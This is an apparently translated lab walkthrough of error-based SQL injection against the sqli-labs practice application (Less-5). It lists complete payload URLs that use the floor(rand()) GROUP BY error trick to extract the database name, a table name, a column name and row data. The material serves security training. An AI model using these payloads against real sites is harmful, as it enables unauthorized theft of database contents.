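Error-based SQL injection method
1. Determine the submission method
String type:
2. Construct the closing delimiter:
The closing character here is '
3. Using the HackBar plugin, you can obtain the URL to request
Database name: security
Clicking database produces the statement that queries the database; copy and paste that statement into the URL to get the database name.
URL statement: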
http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(DATABASE()%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+
Table name: emails
As above, click tables and enter the database name to get the statement that retrieves the table name.
URL statement:
http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(table_name%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=0x7365637572697479%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+
Column name: id
URL statement:
http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20%20%20AND%20(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(column_name%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name=0x656d61696c73%20AND%20table_schema=0x7365637572697479%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+
Data: 1
URL statement:
AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(id) AS CHAR),0x7e)) FROM security.emails LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)